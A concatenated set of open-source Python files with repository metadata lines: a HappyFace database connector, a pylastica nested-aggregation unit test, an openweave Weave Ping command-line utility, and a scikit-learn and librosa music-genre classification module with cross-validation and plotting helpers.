| virtualelephant/openstack-heat-bde-plugin | plugin/BigDataExtensions.py | Python | apache-2.0 | 17,510 |
# -*- coding: utf-8 -*-
#
# Copyright 2012 Institut für Experimentelle Kernphysik - Karlsruher Institut für Technologie
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from sqlalchemy import *
import hf
metadata = MetaData()
engine = None
def connect(implicit_execution=False):
config = dict(hf.config.items("database"))
hf.database.engine = engine_from_config(config, prefix="")
if implicit_execution:
metadata.bind = hf.database.engine
def disconnect():
pass
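# Usage sketch (illustrative only): connect() reads the [database] section of the
# HappyFace configuration and passes it straight to sqlalchemy.engine_from_config
# with an empty prefix, so the keys are plain SQLAlchemy engine options, e.g.:
#
#   [database]
#   url = sqlite:///happyface.db
#   pool_recycle = 3600
#
#   import hf.database
#   hf.database.connect(implicit_execution=True)   # also binds metadata to the engine
#   hf.database.engine.execute("SELECT 1")
#
# The exact option names accepted depend on SQLAlchemy's engine_from_config.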
| HappyFaceMonitoring/HappyFace | hf/database.py | Python | apache-2.0 | 1,009 |
from pylastica.query import Query
from pylastica.aggregation.min import Min
from pylastica.aggregation.nested import Nested
from pylastica.doc_type.mapping import Mapping
from pylastica.document import Document
from tests.base import Base
__author__ = 'Joe Linn'
import unittest
class NestedTest(unittest.TestCase, Base):
def setUp(self):
super(NestedTest, self).setUp()
self._index = self._create_index("test_aggregation_nested")
mapping = Mapping()
mapping.set_properties({
"resellers": {
"type": "nested",
"properties": {
"name": {"type": "string"},
"price": {"type": "double"}
}
}
})
doc_type = self._index.get_doc_type("test")
doc_type.mapping = mapping
docs = [
Document(1, {
"resellers": {
"name": "spacely sprockets",
"price": 5.55
}
}),
Document(2, {
"resellers": {
"name": "cogswell cogs",
"price": 4.98
}
})
]
doc_type.add_documents(docs)
self._index.refresh()
def tearDown(self):
super(NestedTest, self).tearDown()
self._index.delete()
def test_nested_aggregation(self):
agg = Nested("resellers", "resellers")
agg.add_aggregation(Min("min_price").set_field("price"))
query = Query()
query.add_aggregation(agg)
results = self._index.search(query).aggregations['resellers']
self.assertEqual(4.98, results['min_price']['value'])
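        # For reference, the aggregation body this test is expected to send to
        # Elasticsearch looks roughly like the following (a sketch, not taken
        # from the library itself):
        #
        #   "aggs": {
        #       "resellers": {
        #           "nested": {"path": "resellers"},
        #           "aggs": {"min_price": {"min": {"field": "price"}}}
        #       }
        #   }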
if __name__ == '__main__':
unittest.main()
| jlinn/pylastica | tests/aggregation/test_nested.py | Python | apache-2.0 | 1,762 |
#!/usr/bin/env python3
#
# Copyright (c) 2015-2017 Nest Labs, Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# @file
# A Happy command line utility that tests Weave Ping among Weave nodes.
#
# The command is executed by instantiating and running WeavePing class.
#
from __future__ import absolute_import
from __future__ import print_function
import getopt
import sys
import set_test_path
from happy.Utils import *
import WeavePing
if __name__ == "__main__":
options = WeavePing.option()
try:
opts, args = getopt.getopt(sys.argv[1:], "ho:s:c:tuwqp:i:a:e:n:CE:T:",
["help", "origin=", "server=", "count=", "tcp", "udp", "wrmp", "interval=", "quiet",
"tap=", "case", "case_cert_path=", "case_key_path="])
except getopt.GetoptError as err:
print(WeavePing.WeavePing.__doc__)
print(hred(str(err)))
sys.exit(hred("%s: Failed server parse arguments." % (__file__)))
for o, a in opts:
if o in ("-h", "--help"):
print(WeavePing.WeavePing.__doc__)
sys.exit(0)
elif o in ("-q", "--quiet"):
options["quiet"] = True
elif o in ("-t", "--tcp"):
options["tcp"] = True
elif o in ("-u", "--udp"):
options["udp"] = True
elif o in ("-w", "--wrmp"):
options["wrmp"] = True
elif o in ("-o", "--origin"):
options["client"] = a
elif o in ("-s", "--server"):
options["server"] = a
elif o in ("-c", "--count"):
options["count"] = a
elif o in ("-i", "--interval"):
options["interval"] = a
elif o in ("-p", "--tap"):
options["tap"] = a
elif o in ("-C", "--case"):
options["case"] = True
elif o in ("-E", "--case_cert_path"):
options["case_cert_path"] = a
elif o in ("-T", "--case_key_path"):
options["case_key_path"] = a
else:
assert False, "unhandled option"
if len(args) == 1:
options["origin"] = args[0]
if len(args) == 2:
options["client"] = args[0]
options["server"] = args[1]
cmd = WeavePing.WeavePing(options)
cmd.start()
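# Example invocations (node names are illustrative; see WeavePing.WeavePing.__doc__
# for the authoritative usage text):
#
#   weave-ping.py -o node01 -s node02 --tcp --count 5
#   weave-ping.py --origin node01 --server node02 --wrmp --interval 500 --quiet
#   weave-ping.py node01 node02 --udp --case --case_cert_path certs/ --case_key_path keys/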
| openweave/openweave-core | src/test-apps/happy/bin/weave-ping.py | Python | apache-2.0 | 2,876 |
from sklearn.model_selection import StratifiedKFold
from sklearn import tree
from sklearn.ensemble import RandomForestClassifier, ExtraTreesClassifier, GradientBoostingClassifier
from sklearn.metrics import confusion_matrix
from tools import ConfusionMatrixUtils
import pydotplus
import numpy as np
import matplotlib.pyplot as plt
import itertools
import os
import joblib
import librosa
import logging
from featuresExtraction import extractFeatures
try:
from xgboost import XGBClassifier
except ImportError:
print("xgboost not installed!")
# Returns the best classifiers for faster experiments
def bestClfs():
'''
    This method returns a list of the best classifiers found for beatsdataset.csv
:return list: List of classifiers
'''
DTC23 = tree.DecisionTreeClassifier(class_weight=None, criterion='gini', max_depth=None,
max_features=None, max_leaf_nodes=None,
min_impurity_split=1e-07, min_samples_leaf=15,
min_samples_split=61, min_weight_fraction_leaf=0,
presort=False, random_state=None, splitter='best')
# ----> Accuracy: 0.553043478261 +- 0.0141287624428
RFC23 = RandomForestClassifier(bootstrap=True, class_weight=None, criterion='gini',
max_depth=None, max_features=0.497907908371,
max_leaf_nodes=None, min_impurity_split=1e-07,
min_samples_leaf=2, min_samples_split=2,
min_weight_fraction_leaf=0, n_estimators=150, n_jobs=4,
oob_score=True, random_state=None, verbose=0, warm_start=False)
DTC7 = tree.DecisionTreeClassifier(class_weight=None, criterion='gini', max_depth=None,
max_features=None, max_leaf_nodes=None,
min_impurity_split=1e-07, min_samples_leaf=9,
min_samples_split=40, min_weight_fraction_leaf=0,
presort=False, random_state=None, splitter='best')
# ----> Accuracy: 0.553043478261 +- 0.0141287624428
RFC7 = RandomForestClassifier(bootstrap=True, class_weight=None, criterion='gini',
max_depth=None, max_features=0.59,
max_leaf_nodes=None, min_impurity_split=1e-07,
min_samples_leaf=2, min_samples_split=15,
min_weight_fraction_leaf=0, n_estimators=84, n_jobs=4,
oob_score=True, random_state=None, verbose=0, warm_start=False)
ET7 = ExtraTreesClassifier(bootstrap=False, class_weight=None, criterion='gini',
max_depth=None, max_features=0.790926623187,
max_leaf_nodes=None, min_impurity_split=1e-07,
min_samples_leaf=1, min_samples_split=16,
min_weight_fraction_leaf=0, n_estimators=135, n_jobs=4,
oob_score=False, random_state=None, verbose=0, warm_start=False)
GB7 = GradientBoostingClassifier(criterion='friedman_mse', init=None,
learning_rate=0.0150834277809, loss='deviance',
max_depth=None, max_features=0.982060609531,
max_leaf_nodes=None, min_impurity_split=1e-07,
min_samples_leaf=22, min_samples_split=51,
min_weight_fraction_leaf=0, n_estimators=135, presort='auto',
random_state=None, subsample=0.769360696352, verbose=0,
warm_start=False)
    #1 0.548 +-0.015 with beatsdataset.csv (windows and steps 1 1 0.05 0.05) WITHOUT ESSENTIA BPM 0.47
#2 0.492 +- 0.015 with beatsdataset1-1-01-005.csv
#3 0.486 +- 0.015 with beatsdataset1-1-01-01.csv
#4 0.424 +- 0.023 with beatsdataset1-1-04-04.csv
#5 0.4383 +- 0.0103 with beatsdataset1-05-005-0025.csv
#6 0.463 +- 0.032 with beatsdataset138-stStep25.csv
    #7 0.493 +- 0.011 with beatsdataset138-stStep50.csv WITH ESSENTIA BPM 0.56 +- 0.007
#10 0.694 +- 0.044 with gtzan.csv
#ETC = ExtraTreesClassifier(bootstrap=True, criterion="gini",max_features=1, min_samples_leaf=2,min_samples_split=10, n_estimators=100)
# Accuracy 138 step 50 with BPM essentia (0.56260869565217386, 0.012251306785743798)
#ETC = ExtraTreesClassifier(bootstrap=False, criterion="gini",max_features=0.5, min_samples_leaf=2,min_samples_split=10, n_estimators=100)
# Best with GTZAN
#1 0.534 +- 0.01 with beatsdataset.csv
#2 0.46 +- 0.01 with beatsdataset1-1-01-005.csv
#3 0.48 +- 0.014 with beatsdataset1-1-01-01.csv
#4 0.422 +- 0.019 with beatsdataset1-1-04-04.csv
#5 0.4387 +- 0.0182 with beatsdataset1-05-005-0025.csv
#6 0.452 +- 0.0198 with beatsdataset138-stStep25.csv
#7 0.486 +- 0.024 with beatsdataset138-stStep50.csv
#10 0.731 +- 0.021 with gtzan.csv
#GBC = GradientBoostingClassifier(learning_rate=0.1, max_depth=6,max_features=0.5, min_samples_leaf=13,min_samples_split=6, subsample=0.8)
    #1 0.556 +-0.016 with beatsdataset.csv WITHOUT ESSENTIA BPM 0.48
#2 0.477 +- 0.012 with beatsdataset1-1-01-005.csv
#3 0.477 +- 0.007 with beatsdataset1-1-01-01.csv
#4 0.451 +- 0.007 with beatsdataset1-1-04-04.csv
#5 0.443 +- 0.019 with beatsdataset1-05-005-0025.csv
#6 0.479 +- 0.011 with beatsdataset138-stStep25.csv
    #7 0.5 +- 0.02 with beatsdataset138-stStep50.csv WITH ESSENTIA BPM 0.557, 0.017
#10 0.722 +- 0.012 with gtzan.csv
#XGB = XGBClassifier(learning_rate=0.1, max_depth=5,min_child_weight=6, nthread=4,subsample=0.55)
clfs = [DTC23, RFC23, DTC7, RFC7, ET7, GB7]
return clfs
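# Illustrative helper (not part of the original API): compares the classifiers
# returned by bestClfs() on a features CSV using the KFoldAccuracy routine below.
# The CSV path is an assumption; any dataset with a "class" column and only
# feature columns besides it should work.
def compareBestClfs(csv_path="beatsdataset.csv", n_splits=10):
    '''
    Prints the KFold accuracy of each classifier returned by bestClfs().
    :param str csv_path: route of a CSV dataset with a "class" column
    :param int n_splits: number of folds
    :return: list of (classifier, mean accuracy, std) tuples
    '''
    import pandas as pd
    df = pd.read_csv(csv_path)
    results = []
    for clf in bestClfs():
        mean_acc, std = KFoldAccuracy(df, clf, n_splits=n_splits)
        print("%s: %.3f +- %.3f" % (clf.__class__.__name__, mean_acc, std))
        results.append((clf, mean_acc, std))
    return results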
def plot_confusion_matrix(cm, classes,
normalize=False,
title='Confusion matrix',
cmap=plt.cm.Blues):
'''
This function plots a confusion matrix
:param numpy.array cm: Confusion matrix
:param list classes: List of classes
:param boolean normalize: True to normalize
:param str title: Title of the plot
:param cmap: Colours
'''
classes = sorted(classes)
plt.imshow(cm, interpolation='nearest', cmap=cmap, vmax=sum(cm[0][:]))
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(classes))
plt.xticks(tick_marks, classes, rotation=90, fontsize=12)
plt.yticks(tick_marks, classes, fontsize=12)
if normalize:
cm = np.round(100*cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]).astype('int')
print("Normalized confusion matrix")
else:
print('Confusion matrix, without normalization')
print(cm)
thresh = cm.max() / 2.
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
plt.text(j, i, cm[i, j],
horizontalalignment="center",
verticalalignment="center",
color="white" if cm[i, j] > thresh else "black",
fontsize=16)
plt.tight_layout()
plt.ylabel('True label')
plt.xlabel('Predicted label')
def KFoldCrossValidation(df, report_folder, clf, random_state=None):
'''
Generates a report using KFold cross validation.
    It generates a train/test confusion matrix for each kfold, a final confusion matrix
    built from all the test splits, and a report.txt with metrics and other data.
    :param pandas.DataFrame df: DataFrame with the dataset
    :param str report_folder: folder where the pics and the report are saved
    :param clf: sklearn-style classifier with fit, score and predict methods
:return: clf trained with all the data
'''
class_list, features, labels = unpackDF(df)
    # Create the splitter object (10 stratified folds, shuffled, preserving the percentage of each class)
skf = StratifiedKFold(n_splits=10, shuffle=True, random_state=random_state)
# Split the dataset. The skf saves splits index
skf.get_n_splits(features, labels)
# Transform lists to np.arrays
features = np.array(features)
labels = np.array(labels)
# Total predicted label kfold (Used for final confusion matrix)
labels_kfold_predicted = []
# Total labels kfold (Used for final confusion matrix)
labels_kfold = []
# Accuracies for each kfold (Used for final accuracy and std)
accuracies_kfold = []
# Counter for the full report
kcounter = 0
# Report file with useful information
if (os.path.isdir(report_folder)):
logging.warning("The directory %s already exist", report_folder)
else:
logging.info("Creating directory %s", report_folder)
os.mkdir(report_folder, 0o0755)
report = open(os.path.join(report_folder,"report.txt"), "w")
codes = []
# Iterate over the KFolds and do stuff
for train_index, test_index in skf.split(features, labels):
# Splits
features_train, features_test = features[train_index], features[test_index]
labels_train, labels_test = labels[train_index], labels[test_index]
        # Train the classifier on the training folds (90% of samples with 10 folds)
        clf.fit(features_train, labels_train)
        # And predict on the held-out fold (the remaining 10%)
accuracies_kfold.append(clf.score(features_test, labels_test))
# Labels predicted for test split
labels_pred_test = clf.predict(features_test)
labels_kfold.extend(labels_test)
labels_kfold_predicted.extend(labels_pred_test)
codes.extend(features_test[:,71])
kcounter += 1
print(accuracies_kfold)
print("\nMean accuracy: " + str(np.mean(accuracies_kfold)) + " +- " + str(np.std(accuracies_kfold)) + "\n")
report.write("Accuracies: " + str(accuracies_kfold) + "\nMean accuracy: " + str(np.mean(accuracies_kfold)) + " +- " + str(
np.std(accuracies_kfold)) + "\n")
# Confusion matrix with all the predicted classes
cm_kfold_total = confusion_matrix(labels_kfold, labels_kfold_predicted)
    # Get the current figure size and make it bigger
    fig_size = plt.rcParams["figure.figsize"]
    # Set the figure size according to the number of classes
size = len(class_list) - len(class_list)*30/100
fig_size[0] = size
fig_size[1] = size
plt.rcParams["figure.figsize"] = fig_size
plt.figure()
plot_confusion_matrix(cm_kfold_total, class_list, False, "Full test Confusion")
plt.savefig(os.path.join(report_folder,"cmkfolds.pdf"))
cmm = ConfusionMatrixUtils(cm_kfold_total, class_list)
report.write(cmm.report() + "\n\n")
joblib.dump(cmm,os.path.join(report_folder,"cmm"))
joblib.dump(cmm.cmmToGraph(),os.path.join(report_folder,"cmgraph"))
clf.fit(features, labels)
return clf, labels_kfold_predicted, codes
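# Usage sketch (paths and classifier choice are illustrative):
#
#   import pandas as pd
#   df = pd.read_csv("beatsdataset.csv")
#   clf, predictions, codes = KFoldCrossValidation(df, "report_rfc", bestClfs()[1])
#   joblib.dump(clf, "report_rfc/classifier.pkl")
#
# The returned classifier is refitted on the full dataset, so the dumped .pkl can
# be passed to predictGenre() further below.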
def TreeKFoldReport(df, report_folder, clf, n_splits=10, random_state=None):
'''
Uses KFold cross validation over the dataset generating info in the report folder.
:param df: pandas.DataFrame with the dataset
:param report_folder: folder to save pics and report
    :param clf: DecisionTreeClassifier
    :param int n_splits: Number of kfolds
    :param random_state: Random state seed
    :return: clf fully trained with the whole dataset
'''
class_list, features, labels = unpackDF(df)
# Feature names list
features_names_full = list(df.columns.values[:-1])
    # Create the splitter object (n_splits stratified folds, shuffled, preserving the percentage of each class)
skf = StratifiedKFold(n_splits=n_splits, shuffle=True, random_state=random_state)
# Split the dataset. The skf saves splits index
skf.get_n_splits(features, labels)
# Transform lists to np.arrays
features = np.array(features)
labels = np.array(labels)
# Total predicted label kfold (Used for final confusion matrix)
labels_kfold_predicted = []
# Total labels kfold (Used for final confusion matrix)
labels_kfold = []
# Accuracies for each kfold (Used for final accuracy and std)
accuracies_kfold = []
# Counter for the full report
kcounter = 0
# Report file with useful information
report = open(os.path.join(report_folder, "report.txt"), "w")
# Iterate over the KFolds and do stuff
for train_index, test_index in skf.split(features, labels):
report.write("KFold numero " + str(kcounter) + "\n")
print("Train:", train_index, "Test:", test_index)
report.write("\tTrain: " + str(train_index) + " Test:" + str(test_index) + "\n\n")
# Splits
features_train, features_test = features[train_index], features[test_index]
labels_train, labels_test = labels[train_index], labels[test_index]
# Train the classifier
clf.fit(features_train, labels_train)
accuracies_kfold.append(clf.score(features_test, labels_test))
print(accuracies_kfold[kcounter])
report.write("\tAccuracy: " + str(accuracies_kfold[kcounter]) + "\n")
# Confusion matrix for train and test
labels_pred_test = clf.predict(features_test)
labels_pred_train = clf.predict(features_train)
cm_test = confusion_matrix(labels_test, labels_pred_test)
cm_train = confusion_matrix(labels_train, labels_pred_train)
cmm = ConfusionMatrixUtils(cm_test, class_list)
report.write("\t" + cmm.report() + "\n\n")
"""
        Plotting the confusion matrix for the test set
"""
        # Get the current figure size and make it bigger
        fig_size = plt.rcParams["figure.figsize"]
        # Set the figure size according to the number of classes
size = len(class_list) - len(class_list) * 30 / 100
fig_size[0] = size
fig_size[1] = size
plt.rcParams["figure.figsize"] = fig_size
plt.figure()
plot_confusion_matrix(cm_test, class_list, False, "Test Confusion")
plt.savefig(os.path.join(report_folder,"cmtest" + str(kcounter) + ".pdf"))
"""
        Plotting the confusion matrix for the train set"""
plt.figure()
plot_confusion_matrix(cm_train, class_list, False, "Train Confusion")
plt.savefig(os.path.join(report_folder,"cmtrain" + str(kcounter) + ".pdf"))
labels_kfold.extend(labels_test)
labels_kfold_predicted.extend(labels_pred_test)
kcounter += 1
print(accuracies_kfold)
print("\nMean accuracy: " + str(np.mean(accuracies_kfold)) + "+-" + str(np.std(accuracies_kfold)) + "\n")
report.write(
"Accuracies: " + str(accuracies_kfold) + "\nMean accuracy: " + str(np.mean(accuracies_kfold)) + "+-" + str(
np.std(accuracies_kfold)) + "\n")
cm_kfold_total = confusion_matrix(labels_kfold, labels_kfold_predicted)
plt.figure()
plot_confusion_matrix(cm_kfold_total, class_list, False, "Full test Confusion")
plt.savefig(os.path.join(report_folder,"cmkfolds.pdf"))
cmm = ConfusionMatrixUtils(cm_kfold_total, class_list)
report.write(cmm.report() + "\n\n")
clf.fit(features, labels)
dot_data = tree.export_graphviz(clf, out_file=None,
feature_names=features_names_full,
class_names=class_list,
filled=True, rounded=True,
special_characters=True)
graph = pydotplus.graph_from_dot_data(dot_data)
graph.write_pdf(os.path.join(report_folder,"FinalTree.pdf"))
return clf
def plot_feature_importances(tree_classifier, feat_names, nfeat=10, dimy=6, dimx=8,):
'''
Plots the nfeat more important features of the tree or random forest given.
    :param tree_classifier: classifier, DecisionTree or RandomForest
:param feat_names: The name of the features in the tree
:param nfeat: The number of top features to show
:param dimx: fig size x
:param dimy: fig size y
'''
importances = tree_classifier.feature_importances_
    std = np.std([importances], axis=0)  # std over a single array is all zeros; kept only so yerr has the right shape
indices = importances.argsort()[-nfeat:][::-1]
print("Feature ranking:")
for f in range(nfeat):
print("%d. feature %d (%f)" % (f+1, indices[f], importances[indices[f]]))
plt.figure()
fig_size = plt.rcParams["figure.figsize"]
fig_size[0] = dimx
fig_size[1] = dimy
plt.rc('ytick', labelsize=16)
plt.rcParams["figure.figsize"] = fig_size
plt.title("Feature importances")
plt.bar(range(nfeat), importances[indices],
color="b", yerr=std[indices], align="center")
plt.xticks(range(nfeat), feat_names[indices], rotation=75, fontsize=12)
plt.xlim([-1, nfeat])
plt.show()
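# Usage sketch (assumes a fitted tree-based classifier and the same DataFrame
# layout used elsewhere in this module, i.e. every column except "class" is a feature):
#
#   feat_names = np.array(df.drop(["class"], axis=1).columns)
#   clf = bestClfs()[1].fit(*unpackDF(df)[1:])      # fit on (features, labels)
#   plot_feature_importances(clf, feat_names, nfeat=15)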
def unpackDF(df):
'''
Extract classes, features, and labels from a pandas.DataFrame.
One column of the DataFrame should be called "class" and
the rest are features.
:param DataFrame df: pandas.DataFrame with the dataset
:return: Classes, features, labels
'''
# List with the different labels
class_list = list(df["class"].drop_duplicates())
    # List with all the labels (y)
    labels = list(df["class"].values)
    # List with the features (X)
df = df.drop(["class"],axis=1).reset_index(drop=True)
features = []
for j in range(df.shape[0]):
        item = df.iloc[j]
features.append([item[i] for i in range(len(item))])
return class_list, features, labels
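# NOTE: the row-by-row loop above is equivalent to (and much slower than) a
# vectorised extraction; a sketch of the same unpacking:
#
#   labels = df["class"].tolist()
#   features = df.drop(["class"], axis=1).values.tolist()
#   class_list = list(df["class"].drop_duplicates())
#
# The loop is kept above to preserve the original behaviour exactly.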
def KFoldAccuracy(df, clf, n_splits=10, random_state=None):
'''
Computes KFold cross validation accuracy using n_splits folds over the data in the pandas.DataFrame given.
    Uses a stratified KFold with the random_state specified.
    :param df: pandas.DataFrame containing the data for the train/test splits
:param clf: classifier with methods fit, predict and score
:param n_splits: number of splits
:param random_state: random state seed
:return: mean accuracy, std
'''
_, features, labels = unpackDF(df)
    # Create the splitter object (n_splits stratified folds, shuffled, preserving the percentage of each class)
skf = StratifiedKFold(n_splits=n_splits, shuffle=True, random_state=random_state)
# Split the dataset. The skf saves splits index
skf.get_n_splits(features, labels)
# Transform lists to np.arrays
features = np.array(features)
labels = np.array(labels)
# Total predicted label kfold (Used for final confusion matrix)
labels_kfold_predicted = []
# Total labels kfold (Used for final confusion matrix)
labels_kfold = []
# Accuracies for each kfold (Used for final accuracy and std)
accuracies_kfold = []
# Counter for the full report
kcounter = 0
# Iterate over the KFolds and do stuff
for train_index, test_index in skf.split(features, labels):
# Splits
features_train, features_test = features[train_index], features[test_index]
labels_train, labels_test = labels[train_index], labels[test_index]
# Train the classifier
clf.fit(features_train, labels_train)
accuracies_kfold.append(clf.score(features_test, labels_test))
# Labels predicted for test split
labels_pred_test = clf.predict(features_test)
labels_kfold.extend(labels_test)
labels_kfold_predicted.extend(labels_pred_test)
kcounter += 1
meanAccuracy = np.mean(accuracies_kfold)
std = np.std(accuracies_kfold)
return meanAccuracy, std
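# Equivalent result using scikit-learn directly (sketch; shuffling/seed handling
# differs slightly from the loop above):
#
#   from sklearn.model_selection import cross_val_score
#   _, features, labels = unpackDF(df)
#   scores = cross_val_score(clf, np.array(features), np.array(labels),
#                            cv=StratifiedKFold(n_splits=10, shuffle=True))
#   print(scores.mean(), scores.std())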
def predictGenre(song_file_name, clf_pkl=os.path.join(os.path.dirname(__file__),'Examples','beats23classifier.pkl')):
'''
Receives an audio file route and a binary classifier and returns the genre of the song in a string
:param str song_file_name: audio file route
:param str clf_pkl: binary classifier route
:return: genre of the song using the classifier given or the default beatport classifier
'''
clf = joblib.load(clf_pkl)
x, Fs = librosa.load(song_file_name)
x = librosa.resample(x, Fs, 22050)
x = librosa.to_mono(x)
feats = extractFeatures(22050, x[:22050 * 120], 1, 1, 0.05, 0.05)
    return clf.predict([feats])[0]
| Caparrini/pyGenreClf | classifier.py | Python | apache-2.0 | 19,503 |